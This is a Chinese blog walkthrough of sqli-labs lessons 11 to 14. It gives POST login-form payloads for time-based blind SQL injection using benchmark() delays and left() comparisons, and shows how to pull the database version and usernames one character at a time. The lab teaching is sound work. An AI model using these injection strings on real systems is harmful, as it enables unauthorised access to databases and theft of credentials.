Less-11
这个页面采用POST的方法得到数据。于是用HackBar修改post数据进行测试:
uname=admin&passwd=password' and benchmark(10000000,sha(1))#&submit=Submit
测试发现,这个格式的注入使得服务器返回页面变慢,得知之后的benchmark语句得到执行。
所以再构造类似于
uname=admin&passwd=password' and left(version(),1)=5 and benchmark(10000000,sha(1))#&submit=Submit
的语句。如果返回结果变慢,则前面的left函数得到的结果是正确的,才会运行之后的benchmark函数。通过这种方法,可以一点一点地得到数据库的数据。
示例:
uname=admin&passwd=password' and left((select username from users where id = 1),4)='Dumb' and benchmark(10000000,sha(1))#&submit=Submit
Less-12
同上:
password") and benchmark(10000000,sha(1))#&submit=Submit
Less-13
password') and benchmark(10000000,sha(1))#&submit=Submit
Less-14
password" and benchmark(10000000,sha(1))#&submit=Submit
FROM :rickyhao.com | rickyhao.com
恕我孤陋寡闻,这几天才知道有WeChall这个神奇的网站。这个网站算是一个CTF刷题的站吧。有各种题目,还会搜集其他有CTF的网站。当然,应该还有其他这种类型的网站,嗯,求告诉~ 那么,就开始啦~ Training: Get Sourced 这题就是简单地查看…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论